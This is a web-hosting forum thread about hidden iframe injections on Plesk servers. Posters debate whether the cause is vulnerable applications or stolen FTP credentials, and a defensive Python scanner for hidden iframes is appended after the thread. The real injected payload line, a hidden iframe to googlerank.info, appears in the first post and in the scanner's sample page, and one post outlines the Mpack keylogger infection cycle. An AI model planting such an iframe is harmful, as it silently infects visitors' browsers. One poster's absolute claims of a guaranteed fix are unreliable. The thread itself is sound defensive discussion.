
Security Hole in Plesk 8.1? My server domains got injected/exploited.

CBiLL

Guest
I wasn't sure where to post this since it's not "Question or Troubleshooting", so I am posting it here.

One of my domains and some of my customers' domains got injected with this code in their websites.

Code:
<iframe src=http://googlerank.info/counter style=display:none></iframe>

At first I thought my CentOS 4 had a security hole in it, so I did some research to find out where the hole might be and found some folks who experienced the same thing with the same code in their websites, and learned that they run different Linux distros but all run Plesk on their servers.

So that sort of narrows it down to Plesk possibly having a security hole allowing a string to be injected into website scripts or <title>.

I have checked the server and couldn't find anything more, or a trojan, but I am not sure how far they got into my server because there isn't much out there about this injection string, and all the folks I know with this whom I have contacted run Plesk.

Anyone know more about this exploit or string that could shed some more light on it?


Thank you
Bill
 
That's certainly an exploit, but it's in those particular web sites' applications, rather than Plesk.

What applications are your users running?
 
I am running Phorum (http://www.phorum.org), Coppermine Photo Gallery (http://coppermine-gallery.net/), Cerberus HelpDesk (http://www.cerberusweb.com/) and FlashChat (http://www.tufat.com/s_flash_chat_chatroom.htm).

Mine was found injected into the Phorum script where <title> is pulled when visitors are surfing our Phorum.

The 2 others I found were running Phorum, and one other was not running any scripts but got injected into the <title> of their main website, and all of us are using Plesk.

The others I contacted I found by doing some searches and seeing them posting about this injection string on some forums, so I PM'ed them asking if they use any web management software, and they PM'ed back telling me Plesk is what they use, but I did not ask what scripts they had on their websites.

Also, there are others I couldn't get hold of on the forums, but they posted that they are using 1and1 hosting for their server, and I know that 1and1 hosting is a popular Plesk user.


But my other sites on the same server (different domain names) also have Phorum, Coppermine Photo Gallery and FlashChat but no Cerberus HelpDesk, and they did not get injected.

So I would have to narrow it down to either Plesk or Cerberus HelpDesk, or the hacker wasn't aware of the other domains on the same server yet.



Bill
 
I would like to add the reason I posted this today: I couldn't add any new domain to Plesk on my server without it generating an error until I rebooted the server, and it would let me add a new domain after a reboot.

So I was thinking about this string I had discovered about a month back and thought I might post about it to see if that may be one of the reasons why I couldn't add new domains to Plesk.


Here's the post:

http://forum.swsoft.com/showthread.php?s=&threadid=44611



Bill
 
Yeah, it's not a Plesk exploit in this case; the bad guys are exploiting the applications. That it happens to be running on a Plesk box doesn't really make a difference one way or the other.

I've been working on a procedure document on what to do when a system is compromised here:

http://www.atomicorp.com/wiki/index.php/Compromised_System

I've done minimal work on the forensics piece. As I get the time I'm filling this out more and more.
 
Originally posted by atomicturtle
Yeah, it's not a Plesk exploit in this case; the bad guys are exploiting the applications. That it happens to be running on a Plesk box doesn't really make a difference one way or the other.

I've been working on a procedure document on what to do when a system is compromised here:

http://www.atomicorp.com/wiki/index.php/Compromised_System

I've done minimal work on the forensics piece. As I get the time I'm filling this out more and more.

Which application do you suspect might be the cause of this exploit?

Do you think it has gotten further and corrupted my Plesk?




Bill
 
I think that it is more than just a coincidence that during my research the folks I found who suffer from this exploit are using Plesk instead of some different web management control panel, for example cPanel etc.

I would feel more comfortable if I could find someone with this exploit who is using a web management panel other than Plesk, to eliminate Plesk as a possible cause, since Plesk is our main application on the server and is widely used by all domain website customers.

Thank you
Bill
 
There are known exploits in all the applications you mentioned. The control panel isn't a factor in this type of malicious activity. This would require a much longer description of what PSA actually is, but the short version is that it's just manipulating the configuration files of what is already there.

PSA itself is not serving up web pages. That is being done by the web server daemon that came with your distribution, along with PHP, MySQL, etc. What's happening is that you've got applications that your users have installed that are vulnerable to exploitation.

You can search for what types of vulnerabilities your web applications are vulnerable to here:
http://secunia.com/
http://www.securityfocus.com/

I couldn't say which one is being abused without a much deeper investigation to be honest. It could be all of them, if they're not running the latest stable releases.

The procedure I'm documenting is the "worst case" scenario, assuming that the system has been compromised completely. As time goes on, I'll work more tasks into the forensics step to determine the extent of the damage (it's a huge subject, it will likely take me years :p).
 
How does this hacking take place:

This hacking does not take place through any PHP application vulnerability, nor any kernel bug, nor Apache bug, nor cPanel or Plesk bug. The accounts whose files are affected are those whose FTP logins have been leaked.

Believe me, I have been researching this iframe and JavaScript hack for the last 10 months.

ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH THE HACKER!!!!

How it's done
This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent-looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, Firefox and Opera). The visitor is unaware that they may have a keylogger that sends the person's passwords etc. to the hacker(s), and moves on. If the innocent visitor has an FTP or root password for any internet sites, the hackers use a program that goes to the person's site(s) and instantly adds the hidden iframe to every index-type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the FTP or root passwords to log in. And since they have at least your account's FTP password, whatever permissions your folders and files are set to make no difference.

After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers' infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have, starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000, the Russian hacking bulletin boards are offering Mpack with 1 year of support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!


This way the hack is spreading fast from one computer to another, broadcasting the passwords to hackers. During my research into this, I even found some of the password files collected by the hack on some of the hacked servers, where they pass this password file to their tool to add the code. In some cases Google bots pick up these files and you can even find the login details of FTP accounts and server root logins in Google.

===============================================
Solution:
===============================================


For Server Administrators:

If you are having this problem server-wide then the only possibility is that your root password is being used for this. Just change the password and this HACK WILL STOP.

For an individual person owning just a domain and not the server:

If you are facing this problem and your administrator says it's only your account, just change the FTP password and it will stop.

You must have removed the code many times and it comes back again. Why???
Because you don't change the FTP password. So change that first.

Just changing the password is not the complete solution, but it is the first step.
What's next: your password is leaked, which means your computer is sending out the passwords, so I would suggest you do a clean format first and then install any antivirus or antispyware which you think could block it. But the best solution is to clean format the computer.

Just do the two things:

1) Change the FTP or root password of server
2) Clean format the PC

and take care in future that you don't visit any of the virus links made by this hack.
Also, to keep your password secure I would suggest you use password manager software like:

http://keepass.info/

This is FREE open-source software.


I can assure you this is a confirmed solution and will definitely help you all.
Please try it, and when you too have confirmed it, please spread this message in as many forums as you can so that others also come to know how to stop it.

Comments can be sent from:
http://shellscripters.com/contact.htm
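The post above describes the symptom every affected site shares: a hidden iframe quietly added to index-type pages. Since stolen FTP credentials leave no exploit trace in the web application, the practical check for a server administrator is to scan the document roots for that marker. The scanner below is an added example, not code from this thread or from Plesk; the file extensions, the "hidden" markers it looks for, and the sample page are constructed assumptions.

```python
"""Find hidden <iframe> tags in web pages, the marker described in this thread."""
import os
import re
import sys
from typing import List, NamedTuple

# Assumed set of "index type" page extensions worth scanning.
WEB_EXTENSIONS = {".html", ".htm", ".shtml", ".php", ".php3", ".tpl"}

# Any <iframe ...> opening tag; attributes may be unquoted, as in the injected string.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)
# Markers that make the frame invisible to the visitor (assumed list).
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?0\b",
    re.IGNORECASE)

# Constructed sample page carrying the exact string quoted in the first post.
SAMPLE_PAGE = """<html><head>
<title>Phorum</title>
<iframe src=http://googlerank.info/counter style=display:none></iframe>
</head><body>Welcome</body></html>
"""

class Hit(NamedTuple):
    path: str
    line: int
    src: str

def find_hidden_iframes(text: str, path: str = "<inline>") -> List[Hit]:
    """Return one Hit per iframe that is styled or sized to be invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if not HIDDEN_RE.search(tag):
            continue  # visible iframes may be legitimate site content
        src = SRC_RE.search(tag)
        line = text.count("\n", 0, m.start()) + 1
        hits.append(Hit(path, line, src.group(1) if src else ""))
    return hits

def scan_tree(root: str) -> List[Hit]:
    """Walk a document root and collect hidden-iframe hits from web files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in WEB_EXTENSIONS:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits.extend(find_hidden_iframes(fh.read(), full))
    return hits

if __name__ == "__main__":
    for h in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{h.path}:{h.line}: hidden iframe -> {h.src}")
```

Run it against each vhost's httpdocs; a hit in a page the owner never edited, combined with an FTP login in the logs at the file's modification time, is the pattern the post describes.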
 